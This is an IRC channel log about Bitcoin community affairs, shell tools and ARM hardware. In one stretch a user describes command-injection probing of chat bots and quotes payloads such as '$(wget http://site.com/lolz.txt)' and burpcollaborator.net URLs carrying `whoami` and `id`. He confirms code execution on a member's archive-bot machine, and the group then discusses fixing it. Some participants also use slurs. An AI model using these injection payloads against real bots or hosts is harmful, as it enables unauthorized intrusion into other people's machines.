#trilema | 2018-04-03

yep. %%% is better than ///

00:16

turns out the whole kibo site is only 40 mb or so, so I figured I'd try and mirror the whole thing (after browsing it last night, I realized that the meta aspects of the site are part of the fun)

00:17

plaintext dun do it justice

00:17

*

trinque suddenly regrets whatever space unescaping \/ is taking up in his skull.

00:17

lobbes here's a bonus : suppose you have a lengthy file (such as say a server log) and you want to extract just one column. you got awk : cat hurr.txt | awk '{print $3}' (and -F will set the delimiter if space's no good).

00:18

trinque i despise tools that make you escape. really, it's fucking dumb, let the metachar be settable so i can not need it.

00:19

and now consider something like cat *** | grep "data.maryland.gov" | awk '{print $19..$22}' | sort -u << "get me the fields 19th through 22nd, once only, and sorted alphabetically".

00:19

sed + awk are the excel of posix.

00:21

and as it has to be said : you are not a man until you've played a browser game through curl, pipe and awk/sed.

00:21

http://logs.bvulpes.com/trilema?d=2018-4-2#324071 << how did these numbers come out?

00:21

Logged on 2018-04-02 16:54 mircea_popescu: we just discussed this ; s.nsa is at the most selling one of the two spares. ill run the numbers later an' give you an aye or nay.

00:23

still working on it.

00:24

kk

00:27

asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true

~ 1 hours 2 minutes ~

01:30

in other webamusements, https://www.themastermindwithin.com/thoughts/blog-traffic-and-income-report-march-2018/

01:30

"In March 2018, the blog had 7,556 page views and I made $27.09!!"

~ 31 minutes ~

02:01

and in case anyone is missing the usagi era of bitcoin, it didn't end, it just moved on : http://behindmlm.com/companies/empower-network/david-wood-claims-he-can-heal-cancer-herpes-hiv-aids-diabetes/

~ 1 hours 35 minutes ~

03:37

!!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26

03:37

ben_vulpes updated rating of shinohai from 1 to -1 << ran off and took a rather useful tool with him

~ 23 minutes ~

04:00

anyone want to buy some electronics off amazon for me, get reimbursed in btc?

04:06

http://pizarroisp.net/index.php/2018/04/03/pizarro-statement-march-2018/ << PizzaroISP - Pizarro Statement, March 2018

~ 4 hours 21 minutes ~

08:28

logs.bvulpes.com/trilema?d=2018-4-3#324450 <<< have used your script, and it's former incantaion from years ago - very useful things. My solution thus far is simply running a binhost locally, which is temporary as I try to tweak recipe for amd64.

08:28

Logged on 2018-04-03 01:03 trinque: but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done.

08:29

Also, trinque is your www of wot not updating at this time?

08:29

Which brings me to:

08:30

http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.

↖ ↖ ↖ ↖ ↖ ↖

08:30

Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26

08:30

Have a great day #trilema!

08:30

Nos veremos despues.

08:38

hey guys

08:38

I think I got remote code execution on someones box

08:39

https://i.imgur.com/pPZlvQC.png

08:39

the IP address begins with 174.108

↖ ↖

08:39

If that's one of you, please contact me and I will help you resolve this issue

08:50

mornin!

08:50

shinohai, if you could bring that thing that'd be nice.

08:51

meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily.

~ 1 hours 14 minutes ~

10:06

I think shinohai was going to try and send me tars of jhvh1 sometime >> http://btcbase.org/log/2018-03-24#1789503

10:06

Logged on 2018-03-24 00:50 shinohai: I can tar the plugins up for you if you need 'em.

10:06

either way, I'll try and slap up a vanilla gribble on my pizarro shell later this night

10:10

how much fiat are we talkin'? If it is roughly under $500 I would be very interested >> http://btcbase.org/log/2018-04-03#1792246

10:10

Logged on 2018-04-03 08:00 ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc?

10:10

*

lobbes bbl; off to the saltmines

~ 20 minutes ~

10:31

grade a smarm

10:31

lobbes: mk i'll letcha know

10:34

Hey, would you guys be able to show me up a pizarro shell for trb?

~ 29 minutes ~

11:03

mircea_popescu: http://btcbase.org/log/2018-04-03#1792240 >>> http://p.bvulpes.com/pastes/fIWW0/?raw=true

11:03

Logged on 2018-04-03 04:27 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true

11:04

http://btcbase.org/log/2018-04-03#1792259 << neither mine nor anyone i know of

11:04

Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108

11:04

http://btcbase.org/log/2018-04-03#1792258 << this pic is distinctly uninformative , i'd like to note

11:04

Logged on 2018-04-03 12:39 douchebag: https://i.imgur.com/pPZlvQC.png

11:05

asciilifeform: Basically last night I was sending commands in the bot that would lead to remote code execution

11:05

The code execution being wget the url provided in case of blind RCE

11:06

douchebag: ok, so carry on, put up a goatse on deedbot.org or whatever you normally do

11:07

well it isn't deedbots IP

11:07

tho the moar likely explanation is that trinque read the machine log, and, laughing, went to look at what was in yer intended payload url

11:07

but i'll let him answer this one.

11:07

Yeah I figured that was a possibility, I just figured I would mention that incase the code did get executed by anything unintentionally

11:07

this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day.

11:08

and uudecode payloads, deobfuscate js , whatever.

11:08

( and typically very disappointing, usually quite uninspiring, stale '1000-days' )

11:10

http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai

11:10

Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.

11:10

Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26

11:13

douchebag: consider, 174.108. is a konsoomer cable isp in usa .

11:14

('time-warner' co. )

11:18

douchebag: that is not any of my IPs

11:18

what'd you do that got it to belch?

11:24

no clue, I just checked the logs and saw that lolz.txt was grabbed via wget

11:29

auditor: "says here you talk like a fag, and your shit's all retarded"

11:29

http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?

11:29

Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai

11:29

douchebag: I'm asking what the test was, which involved lolz.txt

11:30

shinohai: ben_vulpes made the reason for his neg quite unmysterious, imho

11:31

but i like salt, my popcorn has been a bit bland of late.

11:32

ben_vulpes is also aware *why* checking if bot is in #trilema these days is kinda low on list of priorities, as i am in field and only read logs.

11:32

I don't see join/parts

11:33

trinque: I was just issuing commands to the bot

11:33

ie: !!send $(wget http://site.com/lolz.txt)

11:34

And I saw the file actually was requested with wget from an IP address I did not recognize

11:34

yeah I followed that part the first time

11:34

Okay so what's the question?

11:35

after which command did you get a boop

11:35

I have no clue - I woke up this morning and saw it in the logs

11:35

I tried a number of different requests

11:35

i mean commands

11:36

gpg me the full IP?

11:37

I mean, i still can't play eulora because minigame.bz/ hasn't a server, but i certainly didn't negrate the lot of the #pizarro folks.

11:38

shinohai: weren't you running a bot?

11:38

instead of whining about it, why not bring back said bot

11:38

yup and it shall rejoin as soon as i get back @ desk. my apologies for inconvenience

11:39

whining indeed.

11:39

yes, whining. indeed.

~ 56 minutes ~

12:36

<mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are

12:36

roughly convenience stores. The servicios tend to have better sandwiches

12:39

!!v A4C82702BD7A91BE63B8838DB2164C2B2BC39E9F99B411FB0EEDB8D2192D1F3F

12:39

ben_vulpes unrated shinohai.

12:43

douchebag: When are some Qntra submissions incoming?

12:44

I can have some ready tonight if you can link me to where qntra shares are traded

12:44

last time I tried looking there were so broken links

12:45

http://logs.bvulpes.com/trilema?d=2018-4-3#324745 << you have it backwards; how i behave defines lordship and lo i got my way

12:45

Logged on 2018-04-03 15:20 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?

12:45

Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai

12:54

douchebag: On MPEx, there's proxy issues being sorted out. Sometimes the proxies run away and MP has to chain them back to his Ex

12:57

In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night.

12:58

hey BingoBoingo , possibly i already asked this a while back and then lost -- but plox to gpg me a postage addr where you can get mail. i want to try experiment.

13:03

hola mircea_popescu

13:04

asciilifeform: http://p.bvulpes.com/pastes/Yvat8/?raw=true

13:04

danke BingoBoingo

13:05

asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February.

13:05

heya!

13:06

Buenas Tardes

13:06

and yes BingoBoingo i did think of the item you mentioned, and already prepared it, it ought to satisfy

13:06

ohai mircea_popescu

13:06

douchebag: consider that if you figure out which box responded to you, you at the very least can improve some Lord's bot for him, maybe lobbes' archivebot slurped it? At best, (if it was done in PM), you've got something else listening in, slurping things up.

13:07

that latter would be a mighty interesting blog post

13:07

trinque: Remember the "Reddit Police" DDoS bot?

13:08

naw

13:08

That was 2014-ish

13:08

Roughly coincided with the GAW miners drama.

13:09

http://btcbase.org/log/2018-04-03#1792252 << lol wait, is he on the list of pizarro victims, with thewhet, minigame an' so on ? or what dramas am i missing here ?

13:09

Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.

13:09

Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26

13:09

BingoBoingo i remember a "bitcoin police" lol ?

13:10

(they, self-importantly, didn't want to give self up to #b-a, because of course http://trilema.com/and-in-todays-lulz-the-obnoxious-cocksucker )

13:10

mircea_popescu: Maybe that's what it was.

13:10

http://btcbase.org/log/2018-04-03#1792250 << iirc they were compiled once a day.

13:10

Logged on 2018-04-03 12:29 shinohai: Also, trinque is your www of wot not updating at this time?

13:12

correct, cronulated

13:12

http://logs.bvulpes.com/trilema?d=2018-4-3#324705 << do you not have a machine capable of building trb?

13:12

Logged on 2018-04-03 14:25 douchebag: Hey, would you guys be able to show me up a pizarro shell for trb?

13:12

My machines are capable but if I'm going to be running a node, it would probably be best to have a dedicated VPS to do so

13:13

douchebag generally it runs on actual dedicated machines, rather than vps.

13:13

http://btcbase.org/log/2018-04-03#1792263 << it's all random numbers anyways.

13:13

Logged on 2018-04-03 12:51 mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily.

13:14

Ahh okay

13:14

douchebag: The added value in running more nodes is generally spreading the network geographically, etc. There's little value in adding yet another nominal node to the same box or AWS freakshow

13:14

http://btcbase.org/log/2018-04-03#1792259 << did this ever come to anything then ?!

13:14

Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108

13:14

douchebag dood is building the UCI before we even have it lmao.

13:15

UCI?

13:15

!#s UCI

13:15

189 results for "UCI", http://btcbase.org/log-search?q=UCI

13:15

"universal computing interface"

13:16

ahh

13:16

*

trinque put a rather beefy node in the pizarro rack at 161.0.121.250

13:16

376103 and counting

13:16

Oh also

13:17

asciilifeform the pic shows that he got "something" to load a file from his filehost. supports the theory that has rce, if he can run wget he can run plenty.

13:17

When I geoip'd that IP adddress

13:17

(consider, the way linux works today, if i can run wget as a user i can take the box, the memory leaks.)

13:18

nobody seems to know who or what ran the wget

13:18

wget WILL time the netcard for you, the netcard has dma, that's the wholew story.

13:18

asciilifeform well, some ip apparently. i dunno, going through teh logs.

13:19

asciilifeform's observation was that every idjit crapartist probing an asciilifeform-tended box , ever, without exception thought 'ooh, my wget ran' when asciilifeform reads log , and then , on specially-designated box, manually probes back & grabs payload

13:20

... but in this case, wasn't mine. and, interestingly, apparently not trinque either

13:21

this is a theory we can easily verify. douchebag write f2c26beed4 on the boxes' tits or something. can you get it reliably ?

13:21

not entirely intractable to discern whether human is involved or not.

13:22

aha, supposing replicable

13:22

time will tell you everything.

13:22

I need to get the boxes full IP

13:22

sec

13:22

Actually, I exited out of that - I'm able to retrieve it but I need to know the proper request to send. waiting on a response from that right now

13:23

http://trilema.com/2018/dangerous/ << Trilema - Dangerous

13:23

the proper who ?

13:23

douchebag do you use screen, incidentally ?

13:23

yes

13:24

a ok then.

13:24

I did do a reverse search on that IP address though

13:24

It seemed to be out of North Carolina if I remember correctly

13:24

*

lobbes is slowly assembling parts for his own home trb node. Waiting on replacement cpu fan to come in atm. Updates to follow!

13:24

174.108.31.15

13:25

^ Full IP

13:25

*

mircea_popescu has noticed over the years that the usage of screen is a sort of pons asinorum in computer usage. like the oil rag cloth in a car distinguishes pisi tourist from the driver who actually maintains the machinery ; or like condoms on the nightstand distinguish the woman from the girl and so on.

13:25

Re: douchebag's recent wget payload: I can confirm that it most likely wasn't my archivebot. The bot doesn't download links directly, it stores list of urls found in chan and forwards them to the archive.is submit form

13:26

http://btcbase.org/log/2018-04-03#1792286 << i very well fucking don't. jesus christ, 1mn+ lines/day, god help me. i catgrep the item now and again, but the odds of me noticing something in there are pretty slim.

13:26

Logged on 2018-04-03 15:07 asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day.

13:26

y'know it's still 'read' if you put it through meatgrinder

13:27

but very distantly read. it's a perl meatgrinder, i'm sure it misses most of the meat.

13:27

douchebag looks like a home ip. \

13:28

vulnerable home computers are pestilentially common ; did you get to the portion in the logs where we logged into a shitton of servers administering solar panels ?

13:30

http://btcbase.org/log/2018-04-03#1792296 << oh don't be silly. i now concur with alf, this is no indication of anything yet. get it to do it systematically, in reaction to something you control, THEN you have maybe something.

13:30

Logged on 2018-04-03 15:24 douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget

13:33

http://btcbase.org/log/2018-04-03#1792298 << what do these two have to do with each other anyway. there should be a difference between doing wrong and not doing enough. not every burgher can be in the town council, that dun mean he's bankrupt now or something, what the hell.

13:33

Logged on 2018-04-03 15:29 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?

13:33

Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai

13:33

It it okay if I test this payload again right now

13:33

To see if I get another pingback

13:34

i don't see why not.

13:34

Best case it's just the FBI and they are too busy chasing imaginary Russians to notice you walking away with their server

13:34

Alright, give me a moment I just didn't want to bother anyone with my payloads

13:40

douchebag aha I think that is my home ip. Plox do test payload again

13:40

Oh shit, and you never manually ran wget on that IP

13:40

????

13:41

or on the link???

13:41

Actually, when was this? I think I may hace manually wgot

13:41

*have

13:41

last night

13:41

vjiayxgdlqk1veovjxso63g6ixopce.burpcollaborator.net

13:41

on something that looked like that

13:42

Hmm interesting. Yeah this was a few weeks ago iirc when I curiously grabbed one of yer payloads via wget

13:42

yeah no dude

13:42

If you didn't do this last night

13:42

I got remote code execution on your box

13:42

Can you send me links to the scripts ?

13:42

I'll show you how to fix it

13:43

Also not 100% positive if that was my home ip, but charlotte nc is my residence. I'll confirm that tonight

13:43

So lobbes

13:44

Are any of these things being manually passed into bash commands

13:45

here lets see something

13:45

http://6w3lb8toy1xc8p16w85zjethv814pt.burpcollaborator.net/`whoami`

13:46

lobbes: How often does the bot search ?

13:48

http://3nri25klpyo9zms3n5wwabkem5s2gr.burpcollaborator.net/$(whoami)

13:50

the bot operates from an external vps (not my home ip). Shoves urls into a db which my home box downloads and then passes eaxh one to archive.is.

13:50

and how are you passing these to archive.is

13:52

That is done through a process where a python script reads from (ahhh now I think I see where it may remotely execute) db and passes url via bash to a phantomjs script which submits to archive.is

13:52

Hahaha

13:52

Awesome

13:52

Well for me at least

13:52

For you, I really do suggest fixing that

13:52

I'll dig more into it tonight once I'm in front of it all

13:53

Because if I was a blackhat I could have pwned ur home box

13:53

Yeah really. Thank you for uncovering this (I am n00b, you will soon learn)

13:54

No problem man, just glad I could help!

13:54

Likewise, I'll give ya a favorable rating once in front of my gpg key

13:54

Sounds like a plan

13:57

wd douchebag

13:58

thx <3

14:01

lobbes fwiw this is very poor design.

14:02

Oya. Hey, this is the peril of "learning as you go"

14:02

What would you suggest as a better design? Obvs no passing urls via bash

14:03

why is your home box doing work that's not directed at you ?

14:03

conceptually, if it's talking to you it's an infangwif ; if it's talking to the outside it's an outsidewif. why are you fucking streetwalkers / sending the wife to walk the streets ?

14:04

when you say "home box", what do you even mean ?

14:05

lobbes: If you want to make a secure application, consider all user input as malicious

14:05

lobbes

14:05

Your home machines name is lobbes

14:05

correct?

14:06

mircea_popescu: the logs, but it is an old craptop with an ssd dedicated to public toilet Only place I had to store the gbs of archive data.

14:06

douchebag si

14:06

Yep

14:06

https://i.imgur.com/Wwrp9VP.png

14:06

RCE confirmed

14:07

lobbes well fine, but i was discussing teh design as such. there's no rule against "i have a crappy box for a server that's not worth placing in a dc so it sits in garage", sure. nor is there any rule against "i just simplified speech, called it homebox, it's not" -- but what you say is all i have to go on, that's all.

14:08

douchebag umm, you used his ~browser~ to do this ?!

14:08

I think it's being passed into bash into a PhantomJS interpreter

14:08

^^

14:09

oh.

14:09

nifty.

14:09

Man I feel stupid in general

14:09

!!rated douchebag

14:09

mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions

14:09

!!rate douchebag 2 "your home machine's name is lobbes"

14:09

Get your OTP: http://p.bvulpes.com/pastes/Nn9Ye/?raw=true

14:11

lobbes: Just make sure whenever you handle any user input, consider all input as potentially malicious

14:11

ben_vulpes i wasn't initially going to say anything besides "nay" ; but hey, pizarro's a friend of ours, so : nsa would sell the spare machine for cost, which is about .371. comes with two fgs installed and free shipping.

14:11

and for fucks sake do not pass any user input into a bash interpreter

14:12

douchebag really though, this has been a wake up call to get my shit together. Ty again

14:13

Yeah no problem, it was pretty fun to discover

14:13

!!v 86FC0A4A826976505E6815A4D3677651F10E73948ED9B253C022B65F6C2DFB4E

14:13

mircea_popescu updated rating of douchebag from 1 to 2 << "your home machine's name is lobbes"

14:13

Just know, I'm prolly the easiest target here :P

14:13

i'm not so certain.

14:14

http://f0gufhxx2a1lcy5f0h98nnxqzh5ht6.burpcollaborator.net/`id`

14:16

https://portswigger.net/burp/help/collaborator << that burp thing's not even retarded. runs a dummy server on the side, ns, everything.

14:16

douchebag do you know who made it ?

14:17

It's made by a team of people

14:17

It was originally developed by dafydd portswigger

14:17

right.

14:17

now he has a couple other people working on it, I know ones name is James Kettle

14:18

did you spring for teh $350 a year thing ?

14:18

Yeah, well worth it

14:18

i believe.

14:19

mircea_popescu: I got 0.01 for perma voice, do I get 0.02 for Remote Command Execution :-D ?

14:20

lol. i was going to buy you the pro yearly package, actually. but since you already have it, no need :D

14:20

I appreciate that, feel free to reimburse it though haha

14:22

Man I lol

14:22

Anyways, archivetron's url snarf has been temporarily disabled for obvious reasons. Will resume once I plug these holes tonight

14:22

I'll announce once back up

14:22

I bet so many bots could be pwned with similar techniques

14:23

douchebag i'll get you a sever once the pizarro folk unwrap their heads enough to actually have one on offer. so you can tinker on gentoo, trb etc and get out of the "vps" bs hell.

14:23

A physical serve ?!

14:23

server*

14:23

hey maybe he will be the test patient for the new arm boxen.

14:24

douchebag yeah.

14:24

asciilifeform i dunno he can arm... one thing at a time.

14:24

Holy shit thanks!!

14:25

yeah, tell you what, i'll be as happy as you are once it's finally done.

14:25

mircea_popescu: if all he needs is standard unix userland, no reason he couldn't arm.

14:25

what was on those, i forget ?

14:25

the arm gentoo i am cooking up as we speak.

14:26

i meant hardware

14:26

Well, I'm gonna grab a cigarette to aid with this excitement

14:27

ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs )

↖ ↖ ↖

14:27

chinese thing, they publish schematic , even.

14:27

but ram hdd etc ?

14:28

the unit i am testing ( will buy a few moar once i'm satisfied that it is usable ) came with 2G. there is a 4G supposedly also in production, but i was not able to obtain it

14:28

hdd is a highspeed SD card , and can be of any size ; there is also a usb3 jack, 480MB/s; and a 1G/s nic.

14:28

ah so could actually run trb np

14:29

indeed it could

14:29

faster, in principle, even than zoolag

14:29

this is neat. ok, chuck the largest sd you can find in there an' consider it sold.

14:30

first things first, gotta terraform it.

14:30

yeah.

14:30

then will simply clone the gentoo for each new user ( or he can transmit a SD image , signed , and BingoBoingo will pump it in, plug in a board, and up an' running )

14:31

douchebag alf lands in the oriental republic sometime mid month ; you'll get your login then, an' your first task will be to get trb up on it ; and the tasks 2 throught 999 will be to have fun.

14:31

so clear your schedule 2nd half of april for it.

14:31

asciilifeform i like the model.

14:32

the interesting bit is that these boxen draw ~2 - 5 watt. and are of the physical dimensions of a pack of cards.

14:32

and (unlike e.g. 'raspberry') the full datashits and schems are published.

14:32

chipset is a 'rockchip', i ported trb to it in 2015 iirc.

14:32

(trb, buildroot-kernel, userlands)

14:33

the other interesting pheature of this board is that it has no onboard flash. so nothing to sanitize aside from sdcard.

14:34

( also comes with audio and video but i do not need these and have not tried'em )

14:35

http://btcbase.org/log/2018-04-03#1792306 << ahahaha

14:35

Logged on 2018-04-03 15:33 douchebag: ie: !!send $(wget http://site.com/lolz.txt)

14:36

http://btcbase.org/log/2018-04-03#1792317 << well conceivably for the same reason alf isn't bringing back phuctor, neh. cuz he doesn't as of yet have where to bring it back from!

14:36

Logged on 2018-04-03 15:38 trinque: instead of whining about it, why not bring back said bot

14:37

http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works.

14:37

Logged on 2018-04-03 16:36 BingoBoingo: <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are

14:38

http://btcbase.org/log/2018-04-03#1792327 << yeah, bringing mpex proxies back up is underway.

14:38

Logged on 2018-04-03 16:44 douchebag: last time I tried looking there were so broken links

14:38

general point of "nobody wants your head bud, just move in a direction". I guess he had a health problem, which is rough.

14:38

To wrap back to this discussion, I think I see your point. There's no real reason this craptop needs to deal with the user input at all. All I need it for is to download, store and parse shit download from archive.is. >> http://btcbase.org/log/2018-04-03#17924

14:38

Logged on 2013-05-06 02:54 tiberiusiv: miami is not like NYC lol

14:38

http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope.

14:38

Logged on 2018-04-03 16:57 BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night.

14:39

mircea_popescu: s/meet/meat/g in footnote ii in yer latest article

14:39

lobbes the only important consideration here is that design is not a haphazard activity driven by occurence and circumstance. that's implementation. design is a deductive activity, it proceeds from first principles and does not break faith.

14:39

Wat a111 misquote?

14:40

asciilifeform ty

14:40

mircea_popescu makes sense

14:40

lobbes you lopped off a digit from the url ; it goes by #17924

14:41

Ahh that's what happened

14:41

asciilifeform you know, your page is stale. it was already fixed in the latest version!

14:41

http://btcbase.org/log/2018-04-03#1792546 << Here it isn't a singluar entity running them. It's what they call gas stations without the gas pumps.

14:41

Logged on 2018-04-03 18:37 mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works.

14:42

sounds good

14:42

BingoBoingo http://arc-anglerfish-arc2-prod-gruponacion.s3.amazonaws.com/public/24AKIANLPZAPNEEN7R4CXKBQIQ.jpg << looks like that ?

14:42

http://btcbase.org/log/2018-04-03#1792553 << Naturally and unnaturally.

14:42

Logged on 2018-04-03 18:38 mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope.

14:43

!!up yangwao

14:43

yangwao voiced for 30 minutes.

14:43

!!up yangwao_

14:43

yangwao_ voiced for 30 minutes.

14:43

yangwao_: Who is your daddy and what does he do?

14:43

mircea_popescu: But yeah, I need to think through my designs a bit better. Problem is I'm probably missing some crucial first principles.

14:44

lobbes on the positive side, this is how they were born in the first place, by people thinking about it. no revelation under the sun.

14:44

mircea_popescu: Yeah, the Ururuayan things with that string on their signage don't look like that.

14:44

Perhaps I ought to go through all my existing designs, map them out, and then blog post em for forum critique.

14:44

lobbes can't hurt anything.

14:46

True dat. Anyways I'll bbl. Thanks for allowing me to brain pick

14:47

http://btcbase.org/log/2018-04-03#1792337 << was that fedex'd ?

14:47

Logged on 2018-04-03 17:05 BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February.

14:48

mircea_popescu: Sent US mail, with "International Stamp" per the sender's description

14:48

worth trying a fedex type thing

14:48

Yeah

14:49

later lobbes

14:50

BingoBoingo, mircea_popescu : i learned today, that even shitazon ~will~ ship to BingoBoingoistan, BUT demands about 1 $ to every $ of item ordered , in 'import duty prepay'

14:53

Do you guys know the specs of the server ?

14:53

mircea_popescu: is that free shipping to .uy?

15:00

unfree

15:00

(~on top of~ shipping)

15:04

http://qntra.net/2018/04/venezuelas-education-minister-eat-less-if-you-want-to-see-food-in-supermarkets/ << Qntra - Venezuela's Education Minister: Eat Less If You Want To See Food In Supermarkets

15:04

ben_vulpes well yes.

15:04

douchebag it's above, http://btcbase.org/log/2018-04-03#1792521

15:04

Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs )

15:04

asciilifeform he was asking me not you lol.

15:04

aaa

15:05

*

asciilifeform thought q was re shitazon-to-uy

15:14

How would this compare to a raspberry pi ?

15:15

douchebag: similar, but without the closed shitware iron

15:15

Forsure

15:18

douchebag it's basically a very fast i/o low cpu power box.

15:18

not even so low -- 4 x 1.4GHz 64bit

15:19

the republic's de facto moving towards hardware specialization, there's on one hand the very heavy cpu machines (of which sha miners are a subset, phuctor is another, and so on), and then the sort of thing like this, typified by a trb node machine.

15:19

asciilifeform yeah.

15:19

Ooh interesting

15:20

hahaha

15:20

this is hilarious

15:20

https://i.imgur.com/S18PzjG.png

15:20

Just saw this come in

15:20

as you don't do a lot of numbers churning, it might be tghe perfect item for you. and if not, well, we see.

15:21

Awesome

15:24

re arm box, /me was considering buying the arm64 olinuxino from teh olimex people. the rockchip board seems very similar (++ on the USB3 port), but I can't seem to find it in the EU.

15:25

spyked: olimex lives in eu

15:25

douchebag: If you keep impressing and outgrow the ARM thing, there are worse places to vacation after dropping off a box than Uruguay. The best weather here runs December to February though.

15:25

iirc this dude would be coming out of eastern europe.

15:25

instead of the united retards

15:27

asciilifeform yeah I was talking about the ROC-RK3328-CC. it seems a tad beefier than the olimex counterpart. but otherwise yeah, olimex live very close to me, had a board delivered in ~2 days some months ago.

15:27

funnily enuff , it takes typically 3d to usa !

15:27

( from bulgaria )

15:27

*

asciilifeform buys fairly often from olimex

15:28

spyked so you can get one from teh pizarro too!

15:29

mod6 wasn't he in chicago ?

15:30

Fucking Yankee from upstate

15:30

mircea_popescu: aha, iirc he said he's moving tho

15:30

I will be in the United States in april

15:30

he is better than you rural hicks from southern ill!

15:31

I'm leaving for eastern europe late may

15:31

douchebag: ah just through april tho?

15:31

ah, alright. will keep that in mind.

15:31

mircea_popescu: yeh I'm definitely considering that! the reason I've postponed getting an ARM board at all was the lack of a full-fledged SATA 3 port. I wanna get trb running on arm at some point among others.

15:31

missoury dunno even what chic is, while chicago had it long ago!

15:31

<mircea_popescu> he is better than you rural hicks from southern ill! << This is true. At his age I was solidly anti-productive.

15:32

spyked as described this item would actually make a great node ; whether the practice holds is to be seen in practice.

15:32

also, as a fun-fact: I tried running lispbots on an old first-gen raspberry pi, but it seems SBCL doesn't support threading on ARM (at least not ARMv6 and ARMv7). so I want to test that on ARM64.

15:33

spyked: i found 1st gen raspi (entirely aside the q of closed shitware) to be ~unusable -- it shared a usb bus between nic (already slow) and disk

15:33

Oh but yeah, until then - let me know if there are any IRC bots or web applications you want me to take a look at

15:35

eh, I ended up using it to host my IRC bouncer. at least it's good enough for that.

15:37

spyked: i prefer ccl on low powered machines, the only parts of trinque's bot that rely on sbcl are one or two functions related to thread management

15:37

phf still though, losing out on threading on a quad machine is a little dumb.

15:38

oh, right, that wasn't obvious from what i said, ccl supports multithreading on arms

15:38

a it does ?

15:38

oh cool

15:38

i suppose the question of lisp standardization, soon to be visited upon our fair republic, will be one helluva burning flame.

15:38

i believe rainer joswig hosts his websites on some arm box with CL-HTTP on top of it

15:39

spyked a good move at this point i guess would be patching trinque 's bot to be all cll.

15:41

speaking of pantsuit refraction lulz, https://news.ycombinator.com/item?id=587045

15:41

mircea_popescu: thanks for extending the counteroffer, i'll take it. will you take payment in pizarro credits?

15:41

oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long.

15:42

ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me.

15:44

*

trinque uses ccl elsewhere, would glady sign that patch

15:44

mircea_popescu: works, i'll take it for bonds

15:45

epic contributions from "paul nakata" (hey, nobody on a stick but has a keybase key), some dork who "programs in cl every day" and the whole menagerie of "nobody told us to shut the fuck up like, ever"

15:46

ben_vulpes cool. that takes s.nsa pile to .9 if memory serves ?

15:46

correct you are

15:46

